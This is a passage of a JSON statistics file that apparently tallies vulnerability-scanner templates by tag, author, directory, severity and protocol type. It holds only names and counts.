ount":1},{"name":"matrix","count":1},{"name":"flink","count":1},{"name":"arl","count":1},{"name":"rmc","count":1},{"name":"emby","count":1},{"name":"billquick","count":1},{"name":"weglot","count":1},{"name":"lutron","count":1},{"name":"yzmcms","count":1},{"name":"iucn","count":1},{"name":"photo","count":1},{"name":"omi","count":1},{"name":"phpfusion","count":1},{"name":"pacsone","count":1},{"name":"wavemaker","count":1},{"name":"europeana","count":1},{"name":"hrsale","count":1},{"name":"selea","count":1},{"name":"placeos","count":1},{"name":"razor","count":1},{"name":"shoretel","count":1},{"name":"planon","count":1},{"name":"sangfor","count":1},{"name":"webctrl","count":1},{"name":"cgi","count":1},{"name":"alquist","count":1},{"name":"wavlink","count":1},{"name":"spectracom","count":1},{"name":"salesforce","count":1},{"name":"dotnetnuke","count":1},{"name":"grails","count":1},{"name":"wildfly","count":1},{"name":"clansphere","count":1},{"name":"rubedo","count":1},{"name":"embedthis","count":1},{"name":"cockpit","count":1},{"name":"trilithic","count":1},{"name":"panabit","count":1},{"name":"announcekit","count":1},{"name":"petfinder","count":1},{"name":"kodi","count":1},{"name":"sqlite","count":1},{"name":"webftp","count":1},{"name":"centreon","count":1},{"name":"apiman","count":1},{"name":"soar","count":1},{"name":"hiboss","count":1},{"name":"newrelic","count":1},{"name":"nweb2fax","count":1},{"name":"spf","count":1},{"name":"aura","count":1},{"name":"fortigate","count":1},{"name":"myvuehelp","count":1},{"name":"pivotaltracker","count":1},{"name":"lotuscms","count":1},{"name":"beanstalk","count":1},{"name":"redhat","count":1},{"name":"keenetic","count":1},{"name":"emc","count":1},{"name":"geddy","count":1},{"name":"xmlchart","count":1},{"name":"dvwa","count":1},{"name":"fastapi","count":1},{"name":"circontrorl","count":1},{"name":"gurock","count":1},{"name":"piluscart","count":1},{"name":"uwsgi","count":1},{"name":"mailgun","count":1},{"name":"hubspot","count":1},{"name":"miscrsoft","count":1},{"name":"openstack","count":1},{"name":"extractor","count":1},{"name":"adfs","count":1},{"name":"gateone","count":1},{"name":"cocoon","count":1},{"name":"idor","count":1},{"name":"axiom","count":1},{"name":"messaging","count":1},{"name":"taiga","count":1},{"name":"karel","count":1},{"name":"acontent","count":1},{"name":"smartblog","count":1},{"name":"totolink","count":1},{"name":"commvault","count":1},{"name":"goahead","count":1},{"name":"jenzabar","count":1},{"name":"zm","count":1},{"name":"addpac","count":1},{"name":"swagger","count":1},{"name":"bhagavadgita","count":1},{"name":"cwp","count":1},{"name":" default-login","count":1},{"name":"darkstat","count":1},{"name":"jitsi","count":1},{"name":"fcm","count":1},{"name":"mojoauth","count":1},{"name":"nuxeo","count":1},{"name":"dbt","count":1},{"name":"spidercontrol","count":1},{"name":"elfinder","count":1},{"name":"trello","count":1},{"name":"haproxy","count":1},{"name":"discord","count":1},{"name":"pippoint","count":1},{"name":"tinypng","count":1},{"name":"xunchi","count":1},{"name":"daybyday","count":1},{"name":"netrc","count":1},{"name":"gotmls","count":1},{"name":"vscode","count":1},{"name":"pcoip","count":1},{"name":"cvnd","count":1},{"name":"tjws","count":1},{"name":"magicflow","count":1},{"name":"wooyun","count":1},{"name":"square","count":1},{"name":"calendarific","count":1},{"name":"landrayoa","count":1},{"name":"maccmsv10","count":1},{"name":"cyberoam","count":1},{"name":"gstorage","count":1},{"name":"youtube","count":1},{"name":"wamp","count":1},{"name":"h3c-imc","count":1},{"name":"fortiweb","count":1},{"name":"jsp","count":1},{"name":"iconfinder","count":1},{"name":"concrete","count":1},{"name":"opencast","count":1},{"name":"majordomo2","count":1},{"name":"buildkite","count":1},{"name":"stytch","count":1},{"name":"eg","count":1},{"name":"twig","count":1},{"name":"hadoop","count":1},{"name":"ghost","count":1},{"name":"rujjie","count":1},{"name":"simplecrm","count":1},{"name":"dwsync","count":1},{"name":"cscart","count":1},{"name":"phpwiki","count":1},{"name":"dotnet","count":1},{"name":"auth","count":1},{"name":"openerp","count":1},{"name":"ecshop","count":1},{"name":"opm","count":1},{"name":"aspnuke","count":1},{"name":"kerbynet","count":1},{"name":"testrail","count":1},{"name":"klog","count":1},{"name":"zarafa","count":1},{"name":"travis","count":1},{"name":"cloudinary","count":1},{"name":"perl","count":1},{"name":"meraki","count":1},{"name":"xampp","count":1},{"name":"webmin","count":1},{"name":"loqate","count":1},{"name":"tamronos","count":1},{"name":"fortilogger","count":1},{"name":"bookstack","count":1},{"name":"sage","count":1},{"name":"novnc","count":1},{"name":"dotclear","count":1},{"name":"eprints","count":1},{"name":"b2evolution","count":1},{"name":"bigbluebutton","count":1},{"name":"malshare","count":1},{"name":"jaspersoft","count":1},{"name":"syslog","count":1},{"name":"streetview","count":1},{"name":"acme","count":1},{"name":"dreamweaver","count":1},{"name":"eibiz","count":1},{"name":"jfrog","count":1},{"name":"qdpm","count":1},{"name":"iceflow","count":1},{"name":"idemia","count":1},{"name":"jquery","count":1},{"name":"adafruit","count":1},{"name":"camunda","count":1},{"name":"argocd","count":1},{"name":"ecom","count":1},{"name":"mdb","count":1},{"name":"zms","count":1},{"name":"cors","count":1},{"name":"iptime","count":1},{"name":"domxss","count":1},{"name":"clave","count":1},{"name":"checkpoint","count":1},{"name":"meshcentral","count":1},{"name":"finereport","count":1},{"name":"jeewms","count":1},{"name":"javascript","count":1},{"name":"office365","count":1},{"name":"graylog","count":1},{"name":"restler","count":1},{"name":"ognl","count":1},{"name":"sourcebans","count":1},{"name":"codemeter","count":1},{"name":"acrolinx","count":1},{"name":"thedogapi","count":1},{"name":"ewebs","count":1},{"name":"kyan","count":1},{"name":"phpinfo","count":1},{"name":"basic-auth","count":1},{"name":"javafaces","count":1},{"name":"phppgadmin","count":1},{"name":"ncomputing","count":1},{"name":"distance","count":1},{"name":"ulterius","count":1},{"name":"apos","count":1},{"name":"edgemax","count":1},{"name":"fortigates","count":1},{"name":"argussurveillance","count":1},{"name":"dom","count":1},{"name":"wdja","count":1},{"name":"vidyo","count":1},{"name":"rabbitmq","count":1},{"name":"erp-nc","count":1},{"name":"floc","count":1},{"name":"dbeaver","count":1},{"name":"netdata","count":1},{"name":"orbintelligence","count":1},{"name":"listserv","count":1},{"name":"jenkin","count":1},{"name":"sonarcloud","count":1},{"name":"clockwatch","count":1},{"name":"seowon","count":1},{"name":"geutebruck","count":1},{"name":"apigee","count":1},{"name":"weboftrust","count":1},{"name":"turbocrm","count":1},{"name":"etouch","count":1},{"name":"woocomernce","count":1},{"name":"loganalyzer","count":1},{"name":"webadmin","count":1},{"name":"sugarcrm","count":1},{"name":"paypal","count":1},{"name":"clearbit","count":1},{"name":"sast","count":1},{"name":"tenda","count":1},{"name":"sendgrid","count":1},{"name":"clickhouse","count":1},{"name":"labtech","count":1},{"name":"gridx","count":1},{"name":"parentlink","count":1},{"name":"openweather","count":1},{"name":"owa","count":1},{"name":"saltapi","count":1},{"name":"dahua","count":1},{"name":"webex","count":1},{"name":"samba","count":1},{"name":"szhe","count":1},{"name":"default","count":1},{"name":"acemanager","count":1},{"name":"route","count":1},{"name":"moin","count":1},{"name":"mkdocs","count":1},{"name":"bolt","count":1},{"name":"comodo","count":1},{"name":"anchorcms","count":1},{"name":"particle","count":1},{"name":"luftguitar","count":1},{"name":"nuuo","count":1},{"name":"cve202","count":1},{"name":"mailboxvalidator","count":1},{"name":"tongda","count":1},{"name":"mpsec","count":1},{"name":"artica","count":1},{"name":"pihole","count":1},{"name":"gerapy","count":1},{"name":"dvr","count":1},{"name":"virustotal","count":1},{"name":"ebook","count":1},{"name":"monitorix","count":1},{"name":"vercel","count":1},{"name":"shopware","count":1},{"name":"proftpd","count":1},{"name":"werkzeug","count":1},{"name":"aniapi","count":1},{"name":"xvr","count":1},{"name":"bazarr","count":1},{"name":"mrtg","count":1},{"name":"pagerduty","count":1},{"name":"netmask","count":1},{"name":"avtech","count":1},{"name":"plugin","count":1},{"name":"shiro","count":1},{"name":"faraday","count":1},{"name":"graphite","count":1},{"name":"yaws","count":1},{"name":"kubeflow","count":1},{"name":"acexy","count":1},{"name":"zzzcms","count":1},{"name":"kenesto","count":1},{"name":"tracer","count":1},{"name":"knowage","count":1},{"name":"yealink","count":1},{"name":"octoprint","count":1},{"name":"subrion","count":1},{"name":"nimble","count":1},{"name":"phpunit","count":1},{"name":"lancom","count":1},{"name":"cves2001","count":1},{"name":"cse","count":1},{"name":"kindeditor","count":1},{"name":"remkon","count":1},{"name":"eyelock","count":1},{"name":"database","count":1},{"name":"alertmanager","count":1},{"name":"fhem","count":1},{"name":"ueditor","count":1},{"name":"gunicorn","count":1},{"name":"facebook","count":1},{"name":"securityspy","count":1},{"name":"roads","count":1},{"name":"tinymce","count":1},{"name":"websvn","count":1},{"name":"alerta","count":1},{"name":"malwarebazaar","count":1},{"name":"urlscan","count":1},{"name":"timesheet","count":1},{"name":"clusterengine","count":1},{"name":"sco","count":1},{"name":"shoppable","count":1},{"name":"nedi","count":1},{"name":"diris","count":1},{"name":"qsan","count":1},{"name":"motorola","count":1},{"name":"wing-ftp","count":1},{"name":"mysql","count":1},{"name":"intercom","count":1},{"name":"commscope","count":1},{"name":"robomongo","count":1},{"name":"sterling","count":1},{"name":"dnn","count":1},{"name":"key","count":1},{"name":"ganglia","count":1},{"name":"hortonworks","count":1},{"name":"contentkeeper","count":1},{"name":"nearby","count":1},{"name":"blue-ocean","count":1},{"name":"details","count":1},{"name":"bing","count":1},{"name":"rdp","count":1},{"name":"gitbook","count":1},{"name":"jnoj","count":1},{"name":"plone","count":1},{"name":"gespage","count":1},{"name":"fuelcms","count":1},{"name":"kafdrop","count":1},{"name":"asus","count":1},{"name":"xdcms","count":1},{"name":"mongoshake","count":1},{"name":"crm","count":1},{"name":"books","count":1},{"name":"triconsole","count":1},{"name":"mediumish","count":1},{"name":"tplink","count":1},{"name":"limit","count":1},{"name":"codeigniter","count":1},{"name":"improvmx","count":1},{"name":"websphere","count":1},{"name":"opentsdb","count":1},{"name":"upnp","count":1},{"name":"hiawatha","count":1}],"authors":[{"name":"dhiyaneshdk","count":338},{"name":"daffainfo","count":333},{"name":"pikpikcu","count":286},{"name":"pdteam","count":216},{"name":"geeknik","count":172},{"name":"dwisiswant0","count":156},{"name":"pussycat0x","count":90},{"name":"gy741","count":88},{"name":"0x_akoko","count":76},{"name":"princechaddha","count":72},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"gaurang","count":42},{"name":"philippedelteil","count":32},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"r3dg33k","count":12},{"name":"suman_kar","count":12},{"name":"righettod","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"melbadry9","count":10},{"name":"alph4byt3","count":9},{"name":"aashiq","count":8},{"name":"emadshanab","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"meme-lord","count":8},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"divya_mudgal","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"0x240x23elu","count":7},{"name":"rootxharsh","count":6},{"name":"__fazal","count":6},{"name":"johnk3r","count":6},{"name":"caspergn","count":6},{"name":"logicalhunter","count":6},{"name":"iamnoooob","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"ganofins","count":5},{"name":"lu4nx","count":5},{"name":"xelkomy","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":5},{"name":"adam crosser","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"idealphase","count":5},{"name":"_0xf4n9x_","count":4},{"name":"wisnupramoedya","count":4},{"name":"tess","count":4},{"name":"incogbyte","count":4},{"name":"forgedhallpass","count":4},{"name":"defr0ggy","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"leovalcante","count":4},{"name":"impramodsargar","count":3},{"name":"github.com/its0x08","count":3},{"name":"johnjhacking","count":3},{"name":"thomas_from_offensity","count":3},{"name":"alifathi-h1","count":3},{"name":"dudez","count":3},{"name":"z3bd","count":3},{"name":"shine","count":3},{"name":"shifacyclewala","count":3},{"name":"jarijaas","count":3},{"name":"sullo","count":3},{"name":"me9187","count":3},{"name":"r3naissance","count":3},{"name":"emenalf","count":3},{"name":"lark-lab","count":3},{"name":"unstabl3","count":3},{"name":"_generic_human_","count":3},{"name":"vsh00t","count":3},{"name":"0w4ys","count":3},{"name":"andydoering","count":3},{"name":"fyoorer","count":3},{"name":"f1tz","count":3},{"name":"skeltavik","count":3},{"name":"sushantkamble","count":3},{"name":"binaryfigments","count":3},{"name":"mavericknerd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"imnightmaree","count":3},{"name":"lotusdll","count":2},{"name":"foulenzer","count":2},{"name":"randomrobbie","count":2},{"name":"moritz nentwig","count":2},{"name":"davidmckennirey","count":2},{"name":"ree4pwn","count":2},{"name":"0xrudra","count":2},{"name":"zomsop82","count":2},{"name":"sy3omda","count":2},{"name":"0xelkomy","count":2},{"name":"socketz","count":2},{"name":"0xprial","count":2},{"name":"bing0o","count":2},{"name":"nkxxkn","count":2},{"name":"x1m_martijn","count":2},{"name":"afaq","count":2},{"name":"fabaff","count":2},{"name":"k11h-de","count":2},{"name":"whoever","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"g4l1t0","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"martincodes-de","count":2},{"name":"udit_thakkur","count":2},{"name":"vavkamil","count":2},{"name":"arcc","count":2},{"name":"kiblyn11","count":2},{"name":"hetroublemakr","count":2},{"name":"gal nagli","count":2},{"name":"hahwul","count":2},{"name":"r12w4n","count":2},{"name":"gevakun","count":2},{"name":"huowuzhao","count":2},{"name":"pxmme1337","count":2},{"name":"0xsmiley","count":2},{"name":"cocxanh","count":2},{"name":"bp0lr","count":2},{"name":"joeldeleep","count":2},{"name":"bernardofsr","count":2},{"name":"random-robbie","count":2},{"name":"convisoappsec","count":2},{"name":"ffffffff0x","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"parth","count":2},{"name":"manas_harsh","count":2},{"name":"swissky","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"0xcrypto","count":2},{"name":"mohammedsaneem","count":2},{"name":"w4cky_","count":2},{"name":"its0x08","count":2},{"name":"ehsahil","count":2},{"name":"dheerajmadhukar","count":2},{"name":"dahse89","count":2},{"name":"kareemse1im","count":1},{"name":"juicypotato1","count":1},{"name":"pudsec","count":1},{"name":"lethargynavigator","count":1},{"name":"thevillagehacker","count":1},{"name":"push4d","count":1},{"name":"xshuden","count":1},{"name":"remonsec","count":1},{"name":"daviey","count":1},{"name":"gboddin","count":1},{"name":"co0nan","count":1},{"name":"florianmaak","count":1},{"name":"aresx","count":1},{"name":"kre80r","count":1},{"name":"schniggie","count":1},{"name":"un-fmunozs","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"makyotox","count":1},{"name":"pratik khalane","count":1},{"name":"intx0x80","count":1},{"name":"wabafet","count":1},{"name":"nvn1729","count":1},{"name":"retr0","count":1},{"name":"geraldino2","count":1},{"name":"rojanrijal","count":1},{"name":"yuansec","count":1},{"name":"sbani","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"mesaglio","count":1},{"name":"udyz","count":1},{"name":"regala_","count":1},{"name":"0h1in9e","count":1},{"name":"luci","count":1},{"name":"soyelmago","count":1},{"name":"knassar702","count":1},{"name":"nytr0gen","count":1},{"name":"jiheon-dev","count":1},{"name":"ofjaaah","count":1},{"name":"izn0u","count":1},{"name":"omarkurt","count":1},{"name":"toufik airane","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"dawid-czarnecki","count":1},{"name":"ohlinge","count":1},{"name":"streetofhackerr007","count":1},{"name":"andysvints","count":1},{"name":"shifacyclewla","count":1},{"name":"raesene","count":1},{"name":"j33n1k4","count":1},{"name":"affix","count":1},{"name":"fq_hsu","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"clarkvoss","count":1},{"name":"droberson","count":1},{"name":"2rs3c","count":1},{"name":"petruknisme","count":1},{"name":"infosecsanyam","count":1},{"name":"kabirsuda","count":1},{"name":"harshinsecurity","count":1},{"name":"nerrorsec","count":1},{"name":"skylark-lab","count":1},{"name":"alevsk","count":1},{"name":"ringo","count":1},{"name":"jeya seelan","count":1},{"name":"x6263","count":1},{"name":"noamrathaus","count":1},{"name":"ooooooo_q","count":1},{"name":"undefl0w","count":1},{"name":"0ut0fb4nd","count":1},{"name":"oscarintherocks","count":1},{"name":"taielab","count":1},{"name":"s1r1u5_","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"absshax","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"berkdusunur","count":1},{"name":"zandros0","count":1},{"name":"ipanda","count":1},{"name":"ldionmarcil","count":1},{"name":"alperenkesk","count":1},{"name":"fopina","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"b4uh0lz","count":1},{"name":"furkansenan","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"orpheus","count":1},{"name":"sec_hawk","count":1},{"name":"elder tao","count":1},{"name":"0xteles","count":1},{"name":"thezakman","count":1},{"name":"jrolf","count":1},{"name":"xstp","count":1},{"name":"fmunozs","count":1},{"name":"zhenwarx","count":1},{"name":"sickwell","count":1},{"name":"b0rn2r00t","count":1},{"name":"charanrayudu","count":1},{"name":"ajaysenr","count":1},{"name":"whynotke","count":1},{"name":"cookiehanhoan","count":1},{"name":"bolli95","count":1},{"name":"cckuailong","count":1},{"name":"coldfish","count":1},{"name":"mubassirpatel","count":1},{"name":"0xh7ml","count":1},{"name":"blckraven","count":1},{"name":"vzamanillo","count":1},{"name":"bad5ect0r","count":1},{"name":"lark lab","count":1},{"name":"yashanand155","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"shelld3v","count":1},{"name":"ilovebinbash","count":1},{"name":"hanlaomo","count":1},{"name":"_harleo","count":1},{"name":"deena","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"patralos","count":1},{"name":"akshansh","count":1},{"name":"ahmed sherif","count":1},{"name":"mass0ma","count":1},{"name":"kurohost","count":1},{"name":"retr02332","count":1},{"name":"luskabol","count":1},{"name":"0xrod","count":1},{"name":"redteambrasil","count":1},{"name":"tirtha_mandal","count":1},{"name":"pdp","count":1},{"name":"notsoevilweasel","count":1},{"name":"philippdelteil","count":1},{"name":"thebinitghimire","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"andirrahmani1","count":1},{"name":"b0yd","count":1},{"name":"chron0x","count":1},{"name":"iampritam","count":1},{"name":"ahmetpergamum","count":1},{"name":"_c0wb0y_","count":1},{"name":"_darrenmartyn","count":1},{"name":"igibanez","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"sshell","count":1},{"name":"akash.c","count":1},{"name":"notnotnotveg","count":1},{"name":"rodnt","count":1},{"name":"elmahdi","count":1},{"name":"majidmc2","count":1},{"name":"tim_koopmans","count":1},{"name":"shreyapohekar","count":1},{"name":"manuelbua","count":1},{"name":"hakluke","count":1},{"name":"mah3sec_","count":1},{"name":"yavolo","count":1},{"name":"smaranchand","count":1},{"name":"evolutionsec","count":1},{"name":"kaizensecurity","count":1},{"name":"revblock","count":1},{"name":"0xtavian","count":1},{"name":"th3.d1p4k","count":1},{"name":"evan rubinstein","count":1},{"name":"flag007","count":1},{"name":"luqman","count":1},{"name":"husain","count":1},{"name":"alex","count":1},{"name":"becivells","count":1},{"name":"adrianmf","count":1},{"name":"apt-mirror","count":1},{"name":"d0rkerdevil","count":1},{"name":"zinminphy0","count":1},{"name":"borna nematzadeh","count":1},{"name":"willd96","count":1},{"name":"exploitation","count":1},{"name":"micha3lb3n","count":1},{"name":"c3l3si4n","count":1},{"name":"brabbit10","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"qlkwej","count":1},{"name":"yashgoti","count":1},{"name":"bjhulst","count":1},{"name":"mhdsamx","count":1},{"name":"52971","count":1},{"name":"0xd0ff9","count":1},{"name":"furkansayim","count":1},{"name":"elouhi","count":1},{"name":"sicksec","count":1}],"directory":[{"name":"cves","count":913},{"name":"vulnerabilities","count":347},{"name":"exposed-panels","count":318},{"name":"technologies","count":220},{"name":"exposures","count":196},{"name":"misconfiguration","count":163},{"name":"token-spray","count":127},{"name":"takeovers","count":65},{"name":"default-logins","count":63},{"name":"file","count":57},{"name":"workflows","count":44},{"name":"iot","count":36},{"name":"network","count":34},{"name":"miscellaneous","count":22},{"name":"dns","count":12},{"name":"cnvd","count":10},{"name":"fuzzing","count":10},{"name":"headless","count":5}],"severity":[{"name":"info","count":903},{"name":"high","count":691},{"name":"medium","count":516},{"name":"critical","count":322},{"name":"low","count":166}],"types":[{"name":"http","count":2477},{"name":"file","count":57},{"name":"network","count":47},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":1168},{"name":"panel","count":517},{"name":"lfi","count":464},{"name":"xss","count":371},{"name":"wordpress","count":368},{"name":"rce","count":296},{"name":"exposure","count":294},{"name":"cve2021","count":289},{"name":"tech","count":272},{"name":"wp-plugin","count":268},{"name":"cve2020","count":197},{"name":"","count":189},{"name":"token-spray","count":155},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"cve2018","count":122},{"name":"apache","count":120},{"name":"cve2019","count":118},{"name":"cve2010","count":111},{"name":"unauth","count":111},{"name":"default-login","count":111},{"name":"iot","count":104},{"name":"oast","count":97},{"name":"login","count":85},{"name":"redirect","count":73},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"cve2022","count":68},{"name":"misconfig","count":68},{"name":"cve2017","count":64},{"name":"ssrf","count":62},{"name":"sqli","count":62},{"name":"file","count":60},{"name":"wp","count":59},{"name":"router","count":58},{"name":"network","count":53},{"name":"oracle","count":51},{"name":"disclosure","count":46},{"name":"cve2016","count":45},{"name":"auth-bypass","count":42},{"name":"plugin","count":40},{"name":"authenticated","count":38},{"name":"cve2014","count":37},{"name":"google","count":36},{"name":"cve2015","count":36},{"name":"cisco","count":35},{"name":"injection","count":33},{"name":"logs","count":33},{"name":"atlassian","count":32},{"name":"listing","count":30},{"name":"jira","count":30},{"name":"devops","count":29},{"name":"traversal","count":29},{"name":"generic","count":27},{"name":"kubernetes","count":26},{"name":"cms","count":25},{"name":"oss","count":25},{"name":"springboot","count":24},{"name":"adobe","count":24},{"name":"cnvd","count":23},{"name":"proxy","count":22},{"name":"sap","count":22},{"name":"intrusive","count":22},{"name":"vmware","count":21},{"name":"microsoft","count":21},{"name":"misc","count":21},{"name":"debug","count":21},{"name":"aem","count":21},{"name":"service","count":20},{"name":"wp-theme","count":20},{"name":"fuzz","count":20},{"name":"manageengine","count":19},{"name":"dns","count":19},{"name":"cve2012","count":19},{"name":"php","count":18},{"name":"deserialization","count":18},{"name":"zoho","count":18},{"name":"weblogic","count":17},{"name":"tomcat","count":17},{"name":"k8s","count":17},{"name":"aws","count":17},{"name":"ibm","count":16},{"name":"dlink","count":16},{"name":"struts","count":16},{"name":"jenkins","count":15},{"name":"gitlab","count":15},{"name":"fileupload","count":15},{"name":"cve2011","count":15},{"name":"java","count":14},{"name":"cve2009","count":14},{"name":"hp","count":14},{"name":"api","count":14},{"name":"xxe","count":14},{"name":"android","count":14},{"name":"camera","count":13},{"name":"ruijie","count":13},{"name":"firewall","count":13},{"name":"nginx","count":12},{"name":"status","count":12},{"name":"printer","count":12},{"name":"netsweeper","count":12},{"name":"log4j","count":12},{"name":"cve2013","count":12},{"name":"rails","count":12},{"name":"lfr","count":12},{"name":"netgear","count":11},{"name":"magento","count":11},{"name":"graphql","count":11},{"name":"cnvd2021","count":11},{"name":"upload","count":10},{"name":"dell","count":10},{"name":"airflow","count":10},{"name":"grafana","count":10},{"name":"spring","count":10},{"name":"fortigate","count":10},{"name":"coldfusion","count":10},{"name":"jolokia","count":10},{"name":"backup","count":10},{"name":"glpi","count":10},{"name":"cve2008","count":9},{"name":"iis","count":9},{"name":"laravel","count":9},{"name":"wso2","count":9},{"name":"fastjson","count":9},{"name":"woocommerce","count":9},{"name":"drupal","count":9},{"name":"auth","count":9},{"name":"zabbix","count":9},{"name":"mirai","count":9},{"name":"windows","count":9},{"name":"webserver","count":9},{"name":"fortinet","count":9},{"name":"jndi","count":9},{"name":"ftp","count":9},{"name":"github","count":9},{"name":"azure","count":8},{"name":"audit","count":8},{"name":"amazon","count":8},{"name":"zyxel","count":8},{"name":"vcenter","count":8},{"name":"django","count":8},{"name":"scada","count":8},{"name":"citrix","count":8},{"name":"blind","count":8},{"name":"metadata","count":8},{"name":"phpmyadmin","count":8},{"name":"kube","count":8},{"name":"confluence","count":8},{"name":"solr","count":8},{"name":"prometheus","count":8},{"name":"mail","count":7},{"name":"rconfig","count":7},{"name":"exchange","count":7},{"name":"cnvd2020","count":7},{"name":"kafka","count":7},{"name":"files","count":7},{"name":"python","count":7},{"name":"vpn","count":7},{"name":"firebase","count":7},{"name":"sonicwall","count":7},{"name":"squirrelmail","count":7},{"name":"ssti","count":7},{"name":"elasticsearch","count":7},{"name":"maps","count":7},{"name":"bucket","count":7},{"name":"enum","count":6},{"name":"zimbra","count":6},{"name":"ecology","count":6},{"name":"slack","count":6},{"name":"backdoor","count":6},{"name":"crlf","count":6},{"name":"docker","count":6},{"name":"fpd","count":6},{"name":"headless","count":6},{"name":"firmware","count":6},{"name":"nodejs","count":6},{"name":"bigip","count":6},{"name":"go","count":6},{"name":"druid","count":6},{"name":"jboss","count":6},{"name":"magmi","count":6},{"name":"sitecore","count":6},{"name":"huawei","count":6},{"name":"bypass","count":6},{"name":"ofbiz","count":6},{"name":"cicd","count":6},{"name":"lucee","count":6},{"name":"cobbler","count":6},{"name":"dedecms","count":6},{"name":"jetty","count":6},{"name":"minio","count":5},{"name":"kubelet","count":5},{"name":"thinkphp","count":5},{"name":"ssl","count":5},{"name":"leak","count":5},{"name":"rfi","count":5},{"name":"circarlife","count":5},{"name":"solarwinds","count":5},{"name":"artica","count":5},{"name":"cache","count":5},{"name":"fatpipe","count":5},{"name":"metinfo","count":5},{"name":"moodle","count":5},{"name":"storage","count":5},{"name":"microweber","count":5},{"name":"symantec","count":5},{"name":"error","count":5},{"name":"git","count":5},{"name":"apisix","count":5},{"name":"zhiyuan","count":5},{"name":"rseenet","count":5},{"name":"node","count":5},{"name":"symfony","count":5},{"name":"samsung","count":5},{"name":"opensis","count":5},{"name":"icewarp","count":5},{"name":"alibaba","count":5},{"name":"gocd","count":5},{"name":"strapi","count":5},{"name":"setup","count":5},{"name":"keycloak","count":5},{"name":"ruby","count":5},{"name":"artifactory","count":4},{"name":"voip","count":4},{"name":"hoteldruid","count":4},{"name":"kevinlab","count":4},{"name":"asp","count":4},{"name":"terramaster","count":4},{"name":"ognl","count":4},{"name":"cloud","count":4},{"name":"wcs","count":4},{"name":"microstrategy","count":4},{"name":"puppet","count":4},{"name":"nexus","count":4},{"name":"npm","count":4},{"name":"smtp","count":4},{"name":"caucho","count":4},{"name":"beyondtrust","count":4},{"name":"cockpit","count":4},{"name":"hongdian","count":4},{"name":"aspose","count":4},{"name":"db","count":4},{"name":"prestashop","count":4},{"name":"gogs","count":4},{"name":"hpe","count":4},{"name":"mailchimp","count":4},{"name":"cve2007","count":4},{"name":"stripe","count":4},{"name":"search","count":4},{"name":"couchdb","count":4},{"name":"paypal","count":4},{"name":"plesk","count":4},{"name":"elastic","count":4},{"name":"buffalo","count":4},{"name":"xmlrpc","count":4},{"name":"mongodb","count":4},{"name":"sophos","count":4},{"name":"activemq","count":4},{"name":"adminer","count":4},{"name":"jetbrains","count":4},{"name":"sonarqube","count":4},{"name":"cacti","count":4},{"name":"jellyfin","count":4},{"name":"panos","count":4},{"name":"tikiwiki","count":4},{"name":"thinkcmf","count":4},{"name":"springcloud","count":4},{"name":"websphere","count":4},{"name":"photo","count":4},{"name":"hikvision","count":4},{"name":"kibana","count":4},{"name":"oa","count":4},{"name":"cnvd2019","count":4},{"name":"ssh","count":4},{"name":"resin","count":4},{"name":"flink","count":4},{"name":"awstats","count":4},{"name":"kentico","count":3},{"name":"webadmin","count":3},{"name":"modem","count":3},{"name":"synology","count":3},{"name":"database","count":3},{"name":"concrete","count":3},{"name":"javascript","count":3},{"name":"trendnet","count":3},{"name":"graph","count":3},{"name":"selea","count":3},{"name":"aptus","count":3},{"name":"subrion","count":3},{"name":"heroku","count":3},{"name":"linkerd","count":3},{"name":"cisa","count":3},{"name":"square","count":3},{"name":"rlm","count":3},{"name":"httpd","count":3},{"name":"horizon","count":3},{"name":"voipmonitor","count":3},{"name":"mongo","count":3},{"name":"thinfinity","count":3},{"name":"wordfence","count":3},{"name":"ems","count":3},{"name":"panabit","count":3},{"name":"dolibarr","count":3},{"name":"consul","count":3},{"name":"targa","count":3},{"name":"ampps","count":3},{"name":"lansweeper","count":3},{"name":"elfinder","count":3},{"name":"seagate","count":3},{"name":"pentaho","count":3},{"name":"epson","count":3},{"name":"centos","count":3},{"name":"phpinfo","count":3},{"name":"kingsoft","count":3},{"name":"glassfish","count":3},{"name":"octobercms","count":3},{"name":"oauth","count":3},{"name":"dos","count":3},{"name":"globalprotect","count":3},{"name":"redis","count":3},{"name":"exposures","count":3},{"name":"bruteforce","count":3},{"name":"axis","count":3},{"name":"axigen","count":3},{"name":"fortios","count":3},{"name":"geowebserver","count":3},{"name":"fanruan","count":3},{"name":"bitr